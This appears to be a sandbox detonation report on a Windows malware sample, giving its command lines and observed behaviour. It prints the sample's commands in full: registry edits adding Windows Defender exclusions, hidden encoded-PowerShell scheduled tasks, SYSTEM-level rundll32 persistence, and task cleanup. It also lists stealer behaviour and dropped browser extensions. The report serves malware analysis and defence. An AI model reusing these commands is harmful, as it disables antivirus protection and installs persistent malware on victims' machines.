\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPeTzpkvU" /SC once /ST 04:11:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPeTzpkvU"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPeTzpkvU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 02:44:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe\" Ci /OUsite_idPoC 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe Ci /OUsite_idPoC 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\ihclmox.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 02:58:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll\",#1 /eesite_idjzI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-04-06 05:00

Reported

2024-04-06 05:03

Platform

win11-20240221-en

Max time kernel

111s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\KSFvtct.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\wTDcpw.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\MxgcLGb.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\rbfpUFv.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\GwwTbDGcupmwL.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
